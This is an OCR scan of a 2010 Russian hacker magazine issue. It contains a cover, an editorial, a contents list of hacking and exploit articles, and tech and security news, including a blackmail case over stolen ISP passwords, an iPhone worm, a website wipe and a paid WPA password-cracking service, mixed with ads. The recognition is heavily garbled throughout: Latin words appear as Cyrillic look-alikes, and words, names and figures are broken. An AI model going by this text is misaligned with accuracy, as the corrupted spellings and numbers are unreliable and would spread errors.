нер 01-02 (ЯНВАРЬ-ФЕВРАЛЬ) 2010 ПРОСЛУШКА 5КѴРЕ 



ѵѵѵѵѵѵ. хакер, ги 





ВОЛШЕБНЫЕ 
МЕТОДЫ 

НОВЫЙ КЛАСС 
ОШИБОК 
В СКРИПТАХ РНР 

СТР. 48 



и$р 

Ѵ5. МѴА 



ЧТО И НЕ СНИЛОСЬ 
РАЗРАБОТЧИКАМ 



ЗАШ 
СТР. юо 



СЕТЕВЫЕ 
РЕГУЛИРОВЩИКИ 

ВЫБИРАЕМ ДИСТРИБУТИВ 
ДЛЯ СОЗДАНИЯ 
РОУТЕРА 
СТР. 120 



С СИНИМ 
ЗМИЕМ 

ПРОФИЛАКТИКА В50Б 
ДЛЯ НАЧИНАЮЩЕГО 
ДРАЙВЕРОПИСАТЕЛЯ 

СТР. 86 




175 РУБЛЕЙ 

ПОДПИШИСЬ В^ЕДАКЦИИ 

И ПОЛУЧАЙ хакер 

ПО ВЫГОДНОЙ ЦЕНЕ 

ПОДРОБНОСТИ НА СТРАНИЦЕ 138 





Зацени корпускулярно-волновой дуализм этого номера: он одновременно является и январским, и 
февральским! :) Причем это никакой не сдвоенный номер, и Хакер как выходил раз в месяц, так и продолжит 
выходить раз в месяц. 

В чем секрет? Просто мы тут рассудили, что пора переходить на новый график: чтобы зе появлялся в киосках 
к началу месяца, а не в 20-х числах, как было раньше. Собственно, начиная со следующего номера, так и 
будет: мартовский номер выйдет в конце февраля, апрельский - в конце марта и так далее до конца этого 
года, когда выйдет номер Январь-2011. 

Вот такой технический момент. В остальном все по-старому: в этом номере тебя ждет куча новых концептов 
взлома и защиты, интересных обзоров, идей, трюков и советов. 

Приятного чтения! 

ПІкІІ022, ГЛ. ред. =ІС 

пікіІогІсРгеаІ.хакер.ги 



СопІегЛ 



МедаЫеѵѵз 

004 Все новое за последний месяц 

Репчіт 

016 ГОНКИ НА «КАМНЯХ» 

Сравнительное тестирование процессоров различной 
архитектуры от Іпіеі и АМй 

РС_20ЫЕ. 

020 ЧТО НАМ СТОИТ МАС ПОСТРОИТЬ? 

Устанавливаем МакОС на обычный компьютер 

026 9 СКАНЕРОВ БЕЗОПАСНОСТИ 

Лучшие инструменты для пентестера 

030 СЕКРЕТЫ АВТОМАТИЗАЦИИн 

Несколько примеров того, как облегчить себе жизнь 

034 К0ДИНГ ДЛЯ МАЕМО 5 

Пишем ВІиеІюоіЛ-сканнер для КІокіа N900 

Взлом. 

038 ЕАЗУ-НАСК 

Хакерские секреты простых вещей 

042 ОБЗОР ЭКСПЛОИТОВ 

Анализ свеженьких уязвимостей 

048 РНР И ВОЛШЕБНЫЕ МЕТОДЫ 

Сериализация РНР-объектов глазами хакера 

052 ЭКСПЛОИТ «НА КОЛЕНКЕ» 

Пишем эксплойт подручными средствами 

056 СВОЙ ГИПЕРВИЗОР БЛИЖЕ К ТЕЛУ! 

Аппаратная виртуализация на практике 

060 ВЗЛОМ ВСЕЯ СЕТИ 

Отпіз — самый лучший хостинг! 

066 Х-Т00І.5 

Программы для взлома 

Сцена. 

068 ГРЕГХОГЛАНД 

Хакер, писатель, геймер 

Юниксойд 

072 ЧЕРТЕНОК ИЗ ТАБАКЕРКИ 

Детальный обзор РгееВБй 8.0 

076 АРТ И ВСЕ, ВСЕ, ВСЕ 

Изучаем возможности менеджера пакетов АРТ 
и сопутствующих программ 



082 ГОВОРЯЩИЙ ПИНГВИН 

Учим І_іпих говорить и слушать 

Кодинг. 

086 БОРЬБА С СИНИМ ЗМИЕМ 

Краткий мануал по профилактике 

В50й для начинающего драйверописателя 

090 РОБОТ ДЛЯ 0006І.Е ѴѴАѴЕ 

Напишем его на РуОзоп’е! 

094 ПОДСЛУШИВАЕМ 5 КУРЕ 

Хакерский подход к резервному 
копированию ѴоІР-разговоров 

100 ][-Н01УѴѴАК: ИЗР Ѵ5. МА 

Соттоп І_ізр: простота и мощь 
промышленного стандарта 

104 КОДЕРСКИЕ ТИПСЫ И ТРИКСЫ 

Три правила кодинга на С++ 
для настоящих спецов 



5УЫ/АСК. 

108 ОДНИМ МАХОМ 

Централизованное развертывание ѴѴіпсІоѵѵз 7 
при помощи 5ССМ 2007 5Р2 

114 СИМБИОТИЧЕСКАЯ СВЯЗЬ 

Настраиваем связку ВЬагеРоіпІ; 2007, 
Ехсбапде Зегѵег 201 0 и Асбѵе йігесіюгу 

120 СЕТЕВЫЕ РЕГУЛИРОВЩИКИ 

Обзор популярных дистрибутивов-роутеров 

126 ІЫ ИА Р0СІІ5 

Обзор серверных железок 

128 ОСТАТЬСЯ НА ПЛАВУ 

Обвески для ѴѴеЬ-сервера, 
без которых не обойтись 

Юниты 

134 Р5УСН0 

Уязвимые личности:руководство 
по эксплуатации 

140 РА01ШЕ0 

Большой РАО 

143 ДИСКО 

8.5 Гб всякой всячины 

144 мт 

Удобные ѵѵеЬ-сервисы 
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МАРИЯ «МІРК!У_» НЕФЕДОВА МІРРІИгаКЕАІ.ХАКЕР.Ри 




ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 

36-ТЕЛЕФОНЫ ОТ МТС 





ВЕНДЕТТА С ПРОВАЙДЕРОМ 



В Бельгии властям удалось вычислить 
и поймать хакера -шантажи ста, скры- 
вавшегося под ником Ѵепсіейа. Этот 
товарищ нашел некую дырку в системе 
безопасности крупнейшего провайде- 
ра страны — Веідасот, и угрожал опуб- 
ликовать в сети 285тыс. паролей его 
юзеров. Выложив первые 30 паролей в 
широкий доступ, хакер выдвинул всего 
одно, очень простоетребование — 
он хотел, чтобы Веідасот предоставил 
своим пользователям нормальный 
безлимитный тариф. Дело втом, что 
пров установил жесткие лимиты на ска- 
чивание — от 4 до 60 гигабайт в месяц 
и никакого анлима. Когда провайдер 
никакие отреагировал на этот выпад, 
борецза справедливость слил в сеть 



еще 500 паролей, подтвердив, что он 
не блефует. Слив, правда, был зарезан 
на корню модераторами форума, где 
Ѵепбейа выкладывал пароли — они 
почти сразуудалили криминальный 
мессаг. В итоге, Веідасот проблему 
все же признал, но не совсем так, 
какхотелось бы хакеру — провайдер 
обратился в органы, прямиком в бель- 
гийский аналог нашего «отдела «К». 
Киберполицейские сработали весьма 
оперативно — поимка Ѵепбеііа заняла 
чуть более месяца. Шантажистом 
оказался 20-летний студент факультета 
информационных технологий. Теперь 
борцу за безлимит грозит до трех лет 
тюрьмы. 



Крупнейший оператор сотовой связи в России и стра- 
нах СНГ объявил о расширении собственной бренди- 
рованной линейки телефонов и представил первые в 
линейке модели, поддерживающие стандарт ЗС — МТС 
736 и МТС 835. Новые трубки, разработанные компа- 
нией Н и а ѵѵе і для оператора Ѵобаіопе, поставляются на 
российский рынок под брендом МТС в рамках страте- 
гического партнерства двух операторов. Они логично 
продолжают линейку собственных бренд ированных 
телефонов МТС, запущенную в сентябре 2009, с выхо- 
дом аппарата МТС 236. Ожидается, что новые аппараты 
станут одними из наиболее доступных на российском 
рынке моделей ЗС-телефонов. 736-й ориентирован на 
молодежный сегмент рынка, а 835-й на бизнесменов. 
На трубки распространяется трехлетняя гарантия: 
один год — для любого владельца телефонов, и допол- 
нительно два года — для абонентов МТС. 



КОМПАНИЯ Е2ТѴ РЕШИЛА ВЫЯВИТЬ САМЫЙ 
ПОПУЛЯРНЫЙ ТОРРЕНТ-КЛИЕНТ, 

И ОКАЗАЛОСЬ, НТО ЭТО ВОВСЕ НЕ 1Л0ККЕМТ, 
НАБРАВШИЙ 25.8%, А ХІМЕІ, НЕЙ 
РЕЗУЛЬТАТ - 29.3%. МНОГОЕ ОБЪЯСНЯЕТ 
ТОТ ФАКТ, ЧТО ХІЖЕІ - КИТАЙСКИЙ 
КЛИЕНТ. 



► 004 



ХАКЕР 01 /133/ 10 





Наш РС никогда не висит! 




Карта мужского рода 



■ Специальные мероприятия 

■ Скидки на компьютерные товары 
и не только... 

ѵѵѵѵѵшапсагсі.ги 



МАХІМ 

МУЖСКОЙ журнал с именем 




Альфа-Банк 



(дате)іамі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) 



ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ 
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РС27 

ХАКХАКУ РОЗНЬ 

Как известно, исключения подтверждают правило, и 
хакеров это тоже касается — иногда хаки и малварь 
действительно приносятсвоим авторам не много- 
миллионные штрафы и долгие годы тюрьмы, а славу 
мирскую и приглашения на престижную работу. 

И мен но та к произошло с 21 -летним австралийцем 
Эшли Таунсом, который написал первый вирус для 
іРЬопе. Детище Таунса называлось Ікее и поражало 
только нелегально разлоченные смартфоны Арріе. 

В целом червь был безвреден, он просто менял 
стандартную заставку іРЬопе на фото певца Рика 
Эстли. Если ты вдруг не в курсе — Эстли еще в 80-е 
годы исполнил песню «ЫеѵегОоппа ОіѵеУои ЕІр», 
которая в 2007 году породила в сети мем рикроллин- 
га (гіскгоШпд). Работает рикроллинг просто — тебе 
присылают ссылку на УоиТиЬе, якобы на что-то 
интересное, а, пройдя по линку, ты обнаруживаешь 



клип на песню «ЫеѵегОоппа ОіѵеУои ЕІр». Такчто 
фотка Эстли намекала владельцу зараженного 
телефона, что его отрикроллили :]. Таунс утверждает, 
что написанием вируса он хотел обратить внимание 
общественности на изъяны в ОС и на ее уязвимость. 
Что ж, ему это удалось, ведь Ікее стал точкой отсчета 
для других вирусмэйкеров — на его основе были 
написаны уже совсем не смешные вещи, например, 
вирь, недавно поразивший клиентов сетевого банка 
I N 0 . Однако Таунсза свои проделки с фоткой Эстли 
никакого наказания непонес.атеперьегои вовсе 
пригласили на работу в фирму, разрабатывающую 
легальные приложения для іРЬопе. Многие ІТ-де- 
ятели уже высказались относительно этого события 
в негативном ключе, считая, что вознаграждать 
человека за нелицеприятные поступки, в которых он 
даже не раскаивается, неправильно. 




| -о 



И ЗДА ТЕЛЬСКШ ДОМ 




УЧЕНЫЕ 

КАЛИФОРНИЙСКОГО 
УНИВЕРСИТЕТА 
ПОДСЧИТАЛИ, ЧТО 
СРЕДНИЙ АМЕРИКАНЕЦ 
ПОТРЕБЛЯЕТ ПОРЯДКА 
34 ГБ ДАННЫХ В ДЕНЬ. 



ПАРА СЛОВ 0 ПОЛЬЗЕ БЭКАПОВ 



^З-го декабря сайт газеты «Московский 
комсомолец» оказался в буквальном смыс- 
ле уничтожен хакерской атакой, которая, по 
словам главного редактора МК Павла Гусева, 
длилась всего 10 минут. На самом деле, атака 
длилась, конечно, дольше, аупомянутые 10 
минут потребовались непосредственно на 
стирание данных. Аннигиляции подверглось 
все — отбаз данных до фото- и видеоархи- 
ва газеты. Хак произошел ровноза деньдо 
запуска новой версии сайта и за неделю до 
90-летия Издательского дома «Московский 
комсомолец». Самое поразительное во всей 
этой истории, что в результате взлома фото- и 
видеоархив оказались безвозвратно утеря- 



ны, потому как про бэкапы в МК, видимо, не 
слышали или считают, что это «от Лукавого». 
Зато в М К полагают, что взлом был делом рук 
какой-то хакерской организации или даже 
спецслужб. Представители газеты сообщили, 
что отследить атаковавших удалось, но, судя 
по всему, лишь частично — в МКуверяют, что 
взлом произвели из Южной Кореи. Это наводит 
на мысли, что корейские спецслужбы вряд ли 
интересуются «Московским комсомольцем», 
а хакеры, скорее всего, просто хорошо замели 
следы. Если, конечно, хакеры вообще были, и 
сайтне почил с миром по вине, скажем, убор- 
щицы, неудачно опрокинувшей ведро. 



КРУГОВОРОТ ТРЕКЕРОВ В ПРИРОДЕ 




Вокруг крупныхторрент-трекеров в последнее время бушуют 
нешуточные страсти, но некоторые события выбиваются 
даже из уже ставшей привычной череды судов и скандалов. С 
прискорбием сообщаем, что популярнейшийтрекер Міпіпоѵа 
[ тіпіпоѵа.ога і приказал долго жить. Команда уже давно шла на 
всяческие уступки по отношению ккопирастам, то есть, неле- 
гальный контент исчезал стрекера по первомуже требованию 
правообладателей. Что ж, теперь контента не будет вообще. 
Проиграв очередное судебное разбирательство, коллектив 
Міпіпоѵа был вынужден исполнитьуказаниесуда.а именно 
— закрыть трекер для свободной загрузки торрентов, а затем 
провести глобальную зачистку, удалив все раздачи. Отныне 
трекер работаеттолько с системой Сопіепі РізІхіЬибоп.то 
есть на нем раздается контент, выложенный собственноручно 
его создателями. Но, как водится, где плохая новость, там и 
хорошая. Не работавший ссентября месяца трекер ОетопоісІ 
вернулся в строй! Трекер возродился с базами от 1 1 сентября 
2009 года, то есть, фактически не понеся никаких потерь. Про- 
блем с авторизацией у старых юзеров также не наблюдается, 
а регистрация по-прежнему доступна только по инвайтам. 
«Демонойду» пора менятьлоготип на птицу феникс :). 
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ГРАФИЧЕСКИЕ МОЩНОСТИ ОТ ЗАРРНІРЕ 



Компания ЗаррЫге представила новинку в 
линейке Ѵарог-Х — свою вариацию 3-0 карты 
Вабеоп НО 5770. Напомним, что фишкой 
линейки является применение кулеров с 
испарительной камерой в основании. Судя 
по всему, эта конструкция себя оправдывает, 
ведь в ЗаррЫге с гордостью сообщают, что 
их кулер справляется с охлаждением на 9 
градусов лучше по сравнению с референс- 



ным дизайном, а также работает не в пример 
тише. ЗаррЫге НО 5770 оснащена 800-пото- 
ковыми процессорами, 128-битной шиной 
памяти и 1 Гб памяти СООН5. Из разъемов 
наличествуют 2 ОѴІ порта, НОМІ и ОізрІауРогІ:, 
плюс карта поддерживает ОігесШІ, АТІ 
ЕуеГіпКу и режим СгоззЕігеХ. В онлайн-мага- 
зинах цена на девайс колеблется между 145- 
189 евро. 



АНАЛИТИКИ ИЗ РЕ5ЕАРСН АНО МАРКЕТ8 ПРЕДРЕКАЮТ, 
НТО К 2011 ГОДУ ПРОДАЖИ ПК ВОЗЬМУТ ОТМЕТКУ 
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В конце ноября половина интер- 
нета, наверняка, едва не зарабо- 
тала инфаркт, увидев заголовки 
новостныхлент, пестрящие па- 
ническими криками: «Пиратская 
бухта наконец-то закрывается!». 
Но, как выяснилось, никаких при- 
чин для паники не было, а команда 
ТРВ лишь предприняла очеред- 
ной логичный и изящный шаг. 
Администрация трекера 
долго ломала голову над тем, 
как перевести торренты «на 
следующий уровень», и пока 
решила остановиться на связке 



технологии ИНТ и расширения 
битторент-протокола РЕХ, кото- 
рые позволят юзерам загружать 
файлы напрямую другу друга, без 
участия трекера. Заявив в блоге, 
что «трекер больше не нужен», 
создатели ТРВ изменили архи- 
тектуру ресурса, закрыв Ыаскег. 
ШерігаІеЬау.огд и перейдя на 
тадпеЫссылки. Теперь принцип 
работы ТРВ стал похож на, 
скажем, ОС++ и другие файло- 
обменные проги. Каклаконично 
замечают сами админы: «Это 
будущее. И уже настоящее». 






] 






НЕ СМОТРЕТЬ, НЕ СЛУШАТЬ, НЕ КАЧАТЬ 



Правообладатели, похоже, не знают, до чего бы еще добраться и что бы 
такое закрыть, поэтому от их рук все чаще страдают совсем не «средо- 
точия зла», а случайные люди и организации. На этот раз «отличилась» 
Американская ассоциация кинокомпаний (МРАА), принудившая власти 
маленького городка Кошоктон в штате Огайо отключить их муници- 
пальную ѴѴі-Еі сетку с доступом в интернет. Что за страшный контрафакт 
скачивали или распространяли с ее помощью, неизвестно, сообщается 
лишь, что Зопу РісШгез Епіеііаіптепі: обнаружила, что в Кошоктоне 



кто-то посмел загрузить нелегальную копию некоего фильма. Конкретный 
«виновникторжества»также не был найден — сетка была бесплатной и 
открытой, и пользовались ей нетолько чиновники, но и простые горожа- 
не. Нотеперь городок остался без удобной ѴѴі-Еі сети — дело втом, что на 
поднятие системы фильтрации контента у властей города нет средств, а 
послетребования МРАА, местный провайдер сразуже остановил работу 
муниципального сервиса, дабы избежать суда и штрафов с большим 
количеством нулей после запятой. 
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ЧУДЕСА МИНИАТЮРИЗАЦИИ 

Компания ѴІА представила широкой публике материнскую плату рекордного размера — 
всего 6x6см. Новый форм-фа етор в компании назвали МоЬіІе-ІТХ. Это, казалось бы, 
здорово и новость —лишний повод порадоваться достижениям прогресса, но не всетак 
просто. На деле хитрецы из ѴІА, фактически, разделили обычную материнскую плату на 
две части, представив меньшую как«новый форм-фактор», а вторую часть, которая, кстати, 
больше примерно в 2.5 раза, назвали «дополнительной платой ввода-вывода». Очень 
тонкая ирония, учитывая, что на «дополнительной» плате расположилась и батарейка, и 
часть контроллеров портов, и другие «ненужные» вещи :). На меньшей же части девайса 
уместились процессор С7М тактовой частотой 1 ГГц и 512 Мб ООПІІ 667/533МН2 ЗОНАМ. 
Энергопотребление малютки составляет не более 1 2 Вт, и пассивного охлаждения плате 
вполне хватает. Справедливости ради все же отметим, что размер платы ввода-вывода 
может варьироваться в зависимости от ее конфигурации, так что определенной степени 
миниатюрности ѴІА, конечно, действительно достигли. 



'-О 



В МСАРЕЕ ПРОВЕЛИ ОЧЕРЕДНОЕ ИССЛЕДОВАНИЕ, НА ЭТОТ РАЗ НАЗВАВ САМЫЕ 
ОПАСНЫЕ ДОМЕНЫ В СЕТИ. ЛИДИРУЮЩИЕ ПОЗИЦИИ АНТИ-ТОПА ЗАНИМАЮТ 
КАМЕРУН (.СМ), ГОНКОНГ (.НК), КНР (.СИ) И САМОА (.ѴѴЗ). ЗОНЫ .311 И .КЦ ТОЖЕ 
ВОШЛИ В ДЕСЯТКУ НАИБОЛЕЕ ОПАСНЫХ. 




6006 І.Е 0 МЗ Соодіе 



Пожалуй, сейчас стало проще сказать, каких 
сервисов пока нету компании Ооодіе, чем 
пе речи слить уже существующие. Но «Гуглу» 
все мало — компания продолжает поставлять 
нововведения стакой скоростью и втаких 
объемах, что для адекватного их описания нам 
потребовалась бы отдельная рубрика, никак 
не меньше. Однако гугло-рубрики у нас нет, 



посему мы расскажем только отом, что Ооодіе 
запустил сервис РиЫіс 0145. Собственный 
0145-сервис поискового гиганта призван по- 
высить скорость загрузки сайтов и обеспечить 
большую безопасность юзеров. Чтобы подклю- 
читься к нему, достаточно прописать первич- 
ным и вторичным О N5 адреса 8. 8. 8. 8 и 8. 8. 4. 4. В 
ответ на резонную волну параноидальных опа- 



сений Ооодіе заверяет, что не будетзаписывать 
никакую частную информацию пользователей, 
а ІР-адреса не ста нет хранить дольше пары 
дней. Информация о провайдере и местона- 
хождении пользователя также не задержится в 
базах дольше 1 .5-2 недель. Верить Ооодіе или 
нет, решатьтебе. 



ОДИН ЭКРАН ХОРОШО, 
А ДВА ЛУЧШЕ 




Кого сегодня удивишь ноутбуком? Верно — никого, ведь 
какихтолько вариаций лаптопов ни придумали: крохотные 
нетбуки; большие, мощные ноуты, способныезаменить 
собой серьезный десктоп; гибриды лаптопов с планшетны- 
ми ПКит.д., ит.п. Ноеслитебе при всем богатстве выбора 
хочется чего-то оригинального, то, возможно, машинка от 
японской компании Кобііпзба придется подуше. Ноут серии 
01 (026КНЕ16Е) имеет одну интересную фишку — он осна- 
щен сразу двумя 10-дюймовыми экранами с разрешением 
1024x600 каждый. Экраны расположены таким образом, 
что пожеланию можно разложить или сразу оба, образовав 
огромную рабочую область, или же, если нужна компакт- 
ность, можно довольствоваться сложенным вариантом и его 
10-ю дюймами. В остальном конфигурация машинытакова: 
процессор АіЫоп І\Іео МѴ-40 1 .6 ГГц, от 1 до 4 Гб памяти 
ООР2, графический процессор АТІ Рабеоп НО 3200 и жесткий 
дискна 160 Гб. В комплекте имеются адаптер ѴѴі-Еі ІЕЕЕ 
802.1 1 Ь/д/п, ВІиеІооШ ѵег2.1 + ЕОВ, 3 ІІ5В-порта, кардридер 
«3-в- 1 » и веб-камера на 1.3 МП. Цена ноутбука в японских 
интернет-магазинах равна примерно $1 100, плюс расходы 
на пересылку до России. 
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Каждый день, 20:00 

Горячие новости мира компьютерных и видеоигр 
Самая свежая информация об индустрии 
и репортажи с мест событий 



Подробная информация 
на сайте 

* Игра Ршіоіуре 



ИНФОРМАЦИЮ О ПОДКЛЮЧЕНИИ ТРЕБУЙТЕ У ВАШЕГО РЕГИОНАЛЬНОГО ОПЕРАТОРА 
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МЕ6АЫЕѴѴ5 



НОВОЕ ПРЕСМЫКАЮЩЕЕСЯ ОТ ШЕЯ 
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Компания Рагег, чьи клавиатуры, мыши и акустика хорошо 
знакомы геймерам и нетолько, представила пополнение в 
семействе «грызунов». Согласнотрадиции все клавиатуры 
Нат.ег носят имена пауков, акустика — имена рыб, а мыши 
называютв честь змей, так что новинка получила имя Нат.ег 
Ітрегаіог (императорский удав]. Новая мышь выполне- 
на супором на эргономику, но заточена, увы, только под 
правшей. Зато правши должны порадоваться — у Ітрегаіог 
появилась возможность регулировки положения боковых 
кнопок, что позволяет подстроить девайсточно под размер 
своей руки и даже под манер захвата мыши. Лазерный сен- 
сор Вагег Ргесізіоп 3.50 обеспечит разрешение до 5600брі, 
а традиционные для продуктов Вагегфункция Оп-ТЬе-РІу 
Зепзібѵііу (настройка чувствительности налету] и бесшум- 
ныетефлоновые ножки Шгазііск гарантируют удобство и 
точностьдвижений. Цена новинки составит $80. 



В ХОДЕ ИССЛЕДОВАНИЯ 
КОМПАНИЕЙ «КОМКОН» 

БЫЛО ВЫЯВЛЕНО: УРОВЕНЬ 
ПИРАТСТВА СРЕДИ ДОМАШНИХ 
АНТИВИРУСОВ СОСТАВЛЯЕТ 



70% 





КИБОРГИ ИДУТ 

Какже был правУильям Гибсон, сказавший: 
«будущее уже здесь, просто оно пока не очень 
широко распространено». Ярким и живым до- 
казательством этого изречения стал 51 -летний 
британец Питер Лэйн, потерявший зрение 
более 30 лет назад, а теперь вновь обретший 
его, благодаря бионическому глазу. Лэйн стал 
одним из первых в мире людей, кому в глаз 
имплантировали электронные датчики, стиму- 
лирующие оставшиеся нервы сетчатки и пере- 



правляющие прямо в мозг, через оптические 
нервы, сигнал со специальных очков, в которые 
встроена камера. Операция по имплантации 
датчиков заняла 4 часа, затем еще 2 месяца 
потребовалось на заживление глаза и вот — к 
Лэйну начало возвращаться зрение. Теперь он 
может нетолько различать очертания объектов 
вокруг себя, но даже читать текст со специаль- 
ного экрана. ПомимоЛэйна новую технологию 
уже испытываютна себе еще 32 добровольца. 



ПОИСКОВЫЕ АЛЬЯНСЫ 

Сразу ряд интересных сообщений поступил из стана крупных поисковых компаний. 
Например, стало известно, что компании МаіІ.Ри и Соодіе заключили соглашение о со- 
трудничестве, согласно которому с января 2010 МаіІ.Ри начнетиспользование поисковых 
технологий боодіе и разместитусебя рекламные блоки АсІЗепзе. О своих поисковых 
технологиях МаіІ.Ри, впрочем, забывать тоже не собирается, планируя развивать их не 
менее активно. 

И, почти одновременно с первым сообщением, было объявлено о начале сотрудничества 
между компанией «Яндекс» и Віпд.сот — поисковиком компании МісгозоЛ. В частности, 
для российской аудитории Віпд.сот разместил у себя рекламу с сервиса «Яндекс.Ди- 
рект». Согласно официальным комментариям представителей «Яндекса», размещение 
рекламы на Віпд.сот показало высокую эффективность и себя оправдало. Ограничатся 
ли компании однойтолько рекламой, покажетвремя, а пока все происходящее очень 
напоминает крылатую фразу «против кого дружить будем» :). * 
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МЕ6АЫЕѴѴ5 



РАСПОЗНАВАНИЕ 

ОБРАЗОВ 

И еще немного о боодіе. Недавно широкой 
публике была представлена очень интересная 
программа для платформы Апбгіоб — Соодіе 
Ооддіез. С помощью этой занимательной проги, 
поиск в Сети стало возможно осуществлять не 
через поисковыезапросы, а просто используя 
камеру своего телефона. Практически как в 
фантастических книгах и фильмах — наводишь 
мобильникна интересующий тебя предмет, 
фотографируешь его, и сервис рассказывает 
тебе, что это такое. На текущий момент Соодіе 
Соддіез распознает самые разные книги, диски, 
достопримечательности, магазины, рестораны, 
кафе и даже разбирается в марках вин. В качест- 
ве приятного бонуса прога умеет читать визитки. 
Интересно, какскоро можно будет сфотогра- 
фировать человека на мобильники получить 
информацию о нем? :] 

Другой интересный факт относительно 
платформы Апбгоіб — надняхСергей Брин 
заявил, что в будущем компания планирует 
слить Ап б го і б и СЬготе 05 воедино, взяв 
из каждой ОСи только лучшее и создав 
своего рода идеал. Учитывая, что первые 
девайсы с СЬготе 05 на борту появятся 
только к концу 201 0 года, это далеко иду- 
щие планы. 
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Атлдаидеп; ТТі с ЕлЬгк оГ йсліііу; ТНе 
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ФБР США СООБЩАЕТ, ЧТО МОШЕННИКИ, 
КЛЕПАЮЩИЕ И РАСПРОСТРАНЯЮЩИЕ ФЕЙКОВЫЕ 
АНТИВИРУСЫ УЖЕ ЗАРАБОТАЛИ НА СВОИХ ПОДЕЛКАХ 

БОЛЕЕ $150 млн. 



«ЗЕЛЕНЫЙ» 

МОНИТОР 

Ассортимент компании Ыес пополнился 
новым монитором — 22-дюймовая модель 
МиШ5упс ЕА222ѴѴМе станет первым на- 
стольным монитором от Ыес, использующим 
светодиодную подсветку. Дисплей примеча- 
телен низким энергопотреблением — за счет 
использования светодиодов расход энергии, 
по сравнению с мониторами с ССРБ-под- 
светкой, удалось сократить на 20%. Подчер- 
кивается, что модель в высшей степени эко- 
логична, то есть не содержит ртути, мышьяка 
и галогена и полностью соответствует стан- 
дартам ЕЫЕВОѴ 5ТАВ 5.0, ТОО 5.0 и ЕРЕАТ 
О о 16 . Остальные, более привычные глазу 
характеристики таковы: соотношение сторон 
16:10, разрешение 1 680 х 1050, динамичес- 
кая контрастность 1 :30000, максимальная 
яркость — 250 кд/кв.м. Монитор несет в себе 
разъемы ѴОА, БѴІ, БізрІауРогІ и 115В, а также 
комплектуется встроенными громкоговори- 
телями. Его цена будет равняться примерно 
$339. 
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СЕРВИС 

ПО ПОДБОРУ ПАРОЛЕЙ 

Креативность некоторых людей не знает границ. Небезызвестный 
хакер Мокси Марлинспайк, который ранее «развлекался» подде- 
лкой 551-сертификатов системы РауРаІ, и читал об этом доклады 
на ВІаскНаІ, придумал новую затею. Он открыл сайте говорящим 
именем ѵѵѵѵѵѵ.ѵѵрасгаскег.сопп , где предложил всем желающим свои 
услуги по взлому ѴѴІРІ-сетей. Ни для кого не секрет, что ѴѴРА-сети, 
работающие в режиме Р5К, взломать несложно, в частности, к ним 
можно применить банальный брутфорс. Вотоб этом-то и подумал 
Марлинспайк, когда арендовал у Атагоп ЕС2 «облако» на 400 
процессоров, поднял простенький сайт и прикрутил ко всему этому 
словарь на 135 миллионов слов. Всего за $34 и 20 минут времени 
(или $1 7 и 40 минут соответственно] ѴѴРА Сгаскег проверит, не 
подходитли какое-либо из 135 млн. слов в качестве пароля к 
нужной тебе ѴѴРА-Р5К сетке. К слову, обычный двуядерник будет 
перебирать те же 135 млн. слов около 5 дней. Платежи находчивый 
взломщикпринимаетлегально, через Атагоп Раутепіз, а ресурс 
позиционирует каксервис для проверки сетей на устойчивость 
к взломам. В пору делать ставки, какдолго протянет этот смелый 
проект. 




ѴѴРА 

СВАСКЕВ 



аЬоиі 

Ап Іпігосіисііоп 



ІЩ 



ѴѴРА Сгаскег із а сіоис! сгаскіпд зегѵісе Іо г репеігаііоп іезіегз апб пеіѵѵогк 
аисіііогз ѵѵЗіо пеесі Іо с Нес к ІНе зесигіГу о! ѴѴРА-РЗК ргоіесіесі ѵѵігеіезз 
пеіѵѵогкз. 

ѴѴРА-РЗК пеішгкз аге ѵЫпегаЫе іо ОіеіЕопагу аііаскз, Ьиі шппіпд а 
гезресіаЫе-зігесі сіісіюпагу оѵег а ѴѴРА пеіѵюгк ЬэпйзЬаке сап іаке сіауз 
ог иуеекз, ѴѴРА Сгаскег діѵез уои аесезз іо а 400СРУ сіизіег іЬаі ѵѵііі гип 
уоиг пеіѵѵогк саріиге адаіпзі а 135 тіПіоп ѵѵогсі сіісііопагу сгеаіер 
зресііісаііу іог ѴѴРА раззи/оггіз. ѴѴГііІе Шз ]оЬ ѵѵоиІсЗ Іаке оѵег 5 Рауз оп а 
сопіетрогагу Риаі-соге РС Т оп о иг сіизіег іі Іакез ап аѵегаде оі 20 
тіпиіез, Іо г о піу 517. 






ѴѴе поѵѵ оііег Ѳегтап сіісіюпагу зиррогі, а 284 тІІІіол ѵѵогО 
ехіепсіесі Епдіізіі сіісііопагу орііоп, тй 2ІРііІе сгаскіпд 



ПОДАННЫМ 

«ЛАБОРАТОРИИ 

КАСПЕРСКОГО», 

В НОЯБРЕ НА РАУРАІ 
И ЕВАУ ПРИШЛОСЬ 

44.5% и 19.4% 

ВСЕХ ФИШИНГОВЫХ 
АТАК. 

вш-каѵ/оѵо 

НА ПОДХОДЕ 




АБОНЕНТ ВСЕГДА 0 ВЫИГРЫШЕ! 



Не прошло и пары лете момента победы 
формата Віи-гау над форматом Нй ОМО, 
и в продаже, наконец-то, вот-вот начнут 
появляться двухсторонние ВІи-гау/ОѴО 
диски. Дело в том, что у проигравше- 
го войну формата Нй йѴй та кие диски 
появились еще в 2007 году, а в случае с 
Віи-гау их выпуск явно придерживали 
сознательно. Первой двухсторонней 
ласточкой ста нет трилогия о Джейсоне 
Борне. Цена на диски будетсвоего рода 
золотой серединой — $29.98, дешевле 
Віи-гау, но дороже ОѴО. Стоит сказать, что 
паки ВІи-гау+ОѴО пользуются огромной 
и вполне застуженной популярностью, и, 
в целом, работают на благо продвижения 
технологии Віи-гау в массы. 



Специальное предложение: 

Т Р П С Л П II ИНТЕРНЕТ 

I Ь |В С V и П ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

• Подключение - в любом месте Москвы и Московской обл. 

* Срок подключения а Москве - 1 4 дней, в Московской о6л + - от 14 до 30 дней» 

* Установка прямого московского телефонного номера 
• Многоканальные телефонные номера 
* ІР-телефония 

■ Выделенные линии Интернет 
* Корпоративные частные сети (ѴРМ) 

• Хостинг, услуги оаіе-центра 

РІИ Телеком ѵѵѵѵмѵ.гті.гь е-таіІппіо@гті.ги (495)988-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникаций 
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РЕВВІІЛЛ 



■ ■ АЛЕКСЕЙ ПОЛЯКОВ, ВЛАД ЗАХАРОВ 




Іпіеі Соге 

